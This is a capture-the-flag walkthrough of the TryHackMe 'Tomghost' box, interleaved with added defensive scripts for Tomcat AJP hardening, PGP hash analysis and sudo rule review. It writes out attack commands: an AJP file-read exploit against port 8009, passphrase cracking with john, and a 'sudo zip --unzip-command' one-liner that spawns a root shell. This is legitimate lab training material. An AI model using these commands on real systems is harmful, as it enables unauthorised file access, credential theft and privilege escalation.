Tomghost - TryHackMe Walkthrough
Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to. This is a TryHackMe box. To access it you must sign up at https://tryhackme.com/.
We are given the IP 10.10.31.90. Run an nmap scan with the following command:
nmap -p- -A -oN portscan 10.10.31.90
These are the open ports:
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Here is port 8080 on my browser:
This is just the default Apache Tomcat index page.
I have never seen port 8009 open, so I will investigate this.
AJP (Apache JServ Protocol) is a binary wire protocol: an optimized form of HTTP that lets a standalone web server such as Apache httpd talk to Tomcat.
By default, Apache Tomcat listens on three ports: 8005 (shutdown), 8009 (AJP) and 8080 (HTTP). A common misconfiguration is firewalling port 8080 but leaving port 8005 or 8009 reachable from the public.
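Since the exposure comes from how the AJP connector is configured, here is an added example (written for this walkthrough, not the box's configuration and not Tomcat's own code) that audits a Tomcat server.xml for an AJP connector reachable from outside. Both server.xml fragments are constructed: the first mirrors the stock Tomcat 9.0.30 layout, the second is a hardened variant using the address, secretRequired and secret connector attributes (the latter two exist from Tomcat 9.0.31); the secret value is a placeholder.

```python
# Added example for this walkthrough (not the box's configuration, not Tomcat's
# own code): audit a Tomcat server.xml for an AJP connector that is reachable
# from outside.
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed: unhardened default. The AJP connector binds every interface and
# Tomcat 9.0.30 has no shared-secret support for it.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed: hardened form. AJP is bound to loopback and requires a secret
# (attributes available from Tomcat 9.0.31), and the shutdown port is disabled.
# The secret value is a placeholder, not a real credential.
HARDENED_SERVER_XML = """<Server port="-1" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443"/>
  </Service>
</Server>
"""


def audit_server_xml(xml_text):
    """Return a list of findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings = []

    # The shutdown listener on 8005 is the third default port the text mentions.
    shutdown_port = root.get("port", "8005")
    if shutdown_port != "-1":
        findings.append(f"shutdown listener on port {shutdown_port}; set port=\"-1\" unless it is needed")

    for conn in root.iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        port = conn.get("port", "8009")
        address = conn.get("address")  # None means "listen on all interfaces"
        if address not in LOOPBACK:
            findings.append(
                f"AJP connector on {port} listens on {address or 'all interfaces'}; "
                "bind it with address=\"127.0.0.1\" or remove the connector"
            )
        if conn.get("secretRequired", "true").lower() != "true" or not conn.get("secret"):
            findings.append(
                f"AJP connector on {port} has no shared secret; set secretRequired=\"true\" "
                "and a secret (requires Tomcat 9.0.31 or later)"
            )
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(f"{name}: {audit_server_xml(cfg) or ['no findings']}")
```

Run it against a real server.xml by reading the file into audit_server_xml; the weak fragment produces three findings (shutdown port, unbound AJP, no secret) and the hardened one produces none. If nothing on the host needs AJP, deleting the connector is simpler than hardening it.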
I will be using this tool on github to exploit this vulnerability:
Let's download the raw script onto our local machine:
We now have the script ajpShooter.py.
This is the command to read a file:
python3 ajpShooter.py http://10.10.31.90:8080 8009 /WEB-INF/web.xml read
There are some credentials:
We saw earlier that port 22 was open, so let's try to SSH in with the credentials we just discovered. The password appears to be stored in plaintext; it isn't hashed or encoded.
We are successfully logged in as skyfuck.
The home directory has another user called merlin. We also have the user flag.
cd ..
ls
cd merlin
cat user.txt
I noticed a .pgp file in skyfuck's home directory:
We also have tryhackme.asc, which contains a PGP PRIVATE KEY BLOCK:
I will transfer both files to my local machine so I can attempt to decrypt the .pgp file.
scp skyfuck@10.10.31.90:/home/skyfuck/* .
scp copies files across a network over SSH. Read more about it here:
Here is a YouTube video explaining how to crack a PGP private key passphrase.
We will convert the tryhackme.asc private key into a john-compatible hash with gpg2john.
gpg2john tryhackme.asc > hash
This is what my hash file contains:
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc
Now let's use john to crack the hash. I used the rockyou.txt wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
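To see why a wordlist attack on this key was cheap, here is an added example (not part of gpg2john or john) that decodes the fields of the gpg2john hash shown above. The field layout used is the one gpg2john emits for an iterated+salted S2K secret key, and the algorithm numbers are OpenPGP IDs; the hash string is the one from this walkthrough with john's trailing login and GECOS fields dropped.

```python
# Added example for this walkthrough (not part of gpg2john or john): decode a
# gpg2john hash to see what protects the secret key. Layout for an
# iterated+salted key:
#   $gpg$*pk_algo*datalen*bits*data*s2k_spec*usage*hash_algo*cipher_algo*ivlen*iv*count*salt
# Algorithm numbers are the OpenPGP IDs from RFC 4880.
import math

PK_ALGOS = {1: "RSA", 16: "ElGamal", 17: "DSA"}
HASH_ALGOS = {1: "MD5", 2: "SHA-1", 8: "SHA-256", 10: "SHA-512"}
CIPHER_ALGOS = {3: "CAST5", 7: "AES-128", 9: "AES-256"}
S2K_SPECS = {0: "simple", 1: "salted", 3: "iterated+salted"}

# Largest count the one-octet OpenPGP S2K encoding can express (octet 0xFF).
S2K_MAX_COUNT = 65_011_712

# The hash this walkthrough produced with gpg2john, minus john's extra fields.
HASH_LINE = "$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480"


def decode_s2k_count(octet):
    """OpenPGP's one-octet iterated S2K count: (16 + low nibble) << (high nibble + 6)."""
    return (16 + (octet & 15)) << ((octet >> 4) + 6)


def parse_gpg_hash(hash_str):
    """Split a gpg2john hash into named fields, checking the length fields."""
    if not hash_str.startswith("$gpg$*"):
        raise ValueError("not a gpg2john hash")
    f = hash_str.split("*")[1:]
    if len(f) < 10:
        raise ValueError("too few fields")
    pk, datalen, bits, data, spec, usage, halgo, calgo, ivlen, iv = f[:10]
    rec = {
        "pk_algo": PK_ALGOS.get(int(pk), f"id {pk}"),
        "bits": int(bits),
        "s2k_spec": S2K_SPECS.get(int(spec), f"id {spec}"),
        "usage": int(usage),                       # 254 = SHA-1 checksum on the key material
        "hash_algo": HASH_ALGOS.get(int(halgo), f"id {halgo}"),
        "cipher_algo": CIPHER_ALGOS.get(int(calgo), f"id {calgo}"),
        "data": bytes.fromhex(data),               # encrypted secret-key material
        "iv": bytes.fromhex(iv),
        "s2k_count": None,
        "salt": None,
    }
    if len(rec["data"]) != int(datalen) or len(rec["iv"]) != int(ivlen):
        raise ValueError("length fields do not match payload")
    rest = f[10:]
    if int(spec) == 3:        # iterated+salted: count then salt
        rec["s2k_count"], rec["salt"] = int(rest[0]), bytes.fromhex(rest[1])
    elif int(spec) == 1:      # salted: salt only
        rec["salt"] = bytes.fromhex(rest[0])
    return rec


def guess_cost(rec, block_size=64):
    """Approximate hash compressions per passphrase guess (the S2K feeds `count`
    bytes of salt+passphrase through the hash) and how far the count sits below
    the format's maximum. A higher count makes every wordlist guess slower."""
    count = rec["s2k_count"] or 0
    return {
        "compressions_per_guess": math.ceil(count / block_size),
        "times_below_max": S2K_MAX_COUNT // count if count else None,
    }


if __name__ == "__main__":
    rec = parse_gpg_hash(HASH_LINE)
    print({k: v for k, v in rec.items() if not isinstance(v, bytes)})
    print(guess_cost(rec))
```

For this key the S2K is iterated+salted with SHA-1 and a count of 65536, roughly 1024 SHA-1 compressions per guess and 992 times below the maximum count the format allows, so the passphrase itself was the only real obstacle. A key generated with a high S2K count and a passphrase not found in any wordlist would not fall to the john run above.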
We have some results:
Now that we have the passphrase, let's go back to the SSH session, import the private key and decrypt the .pgp file.
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
We have some credentials:
Switch to that user with the credentials:
Check the user's sudo rights:
We can run zip with sudo, so that is our privilege escalation path. I did some research on zip privilege escalation and found this article:
So let’s create a new file with touch:
Then exploit the sudo rule with the following command:
sudo zip 1.zip f3dai.txt -T --unzip-command="sh -c /bin/bash"
We have spawned a root shell, and found the root flag.
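The root cause here is a sudo rule granting a binary that will run a caller-supplied command. As an added example (not part of sudo and not taken from the box), the script below parses the rule section of `sudo -l` output and flags such entries. The sample output is constructed in sudo -l's format: the zip rule is the one this walkthrough abuses, the user name merlin is assumed, and the other two rule lines are illustrative.

```python
# Added example for this walkthrough (not part of sudo, not the box's real
# sudoers): parse `sudo -l` output and flag rules that give the caller an
# arbitrary command as the run-as user.
import os
import re

# Binaries that execute a caller-supplied command when permitted under sudo.
# Only zip (via --unzip-command, as used above) is listed; extend it from your
# own review of each permitted binary.
RUNS_ARBITRARY_COMMAND = {"zip"}

# "(runas) TAG: cmd, cmd" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample in sudo -l's format; the zip line is the walkthrough's case.
SAMPLE_SUDO_L = """\
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/systemctl restart tomcat9
    (ALL : ALL) ALL
"""


def parse_sudo_l(text):
    """Return the rule lines that follow 'User X may run ...' as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmds": cmds})
    return rules


def risky_rules(rules):
    """Findings for rules that let the caller run an arbitrary command as the run-as user."""
    findings = []
    for rule in rules:
        nopass = " without a password" if "NOPASSWD" in rule["tags"] else ""
        for cmd in rule["cmds"]:
            words = cmd.split()
            name = os.path.basename(words[0])
            if cmd == "ALL":
                findings.append(f"'{cmd}' as ({rule['runas']}): unrestricted sudo{nopass}")
            elif name in RUNS_ARBITRARY_COMMAND and len(words) == 1:
                # No arguments pinned in sudoers, so the caller controls every flag.
                findings.append(
                    f"'{cmd}' as ({rule['runas']}): {name} can run an arbitrary command{nopass}; "
                    "remove the rule or pin the allowed arguments in sudoers"
                )
    return findings


if __name__ == "__main__":
    for finding in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

On the sample it reports the zip rule (NOPASSWD, no arguments pinned) and the catch-all ALL rule, and leaves the systemctl rule alone because its arguments are fixed. Feed it real `sudo -l` output during a host review to find the same class of rule before someone else does.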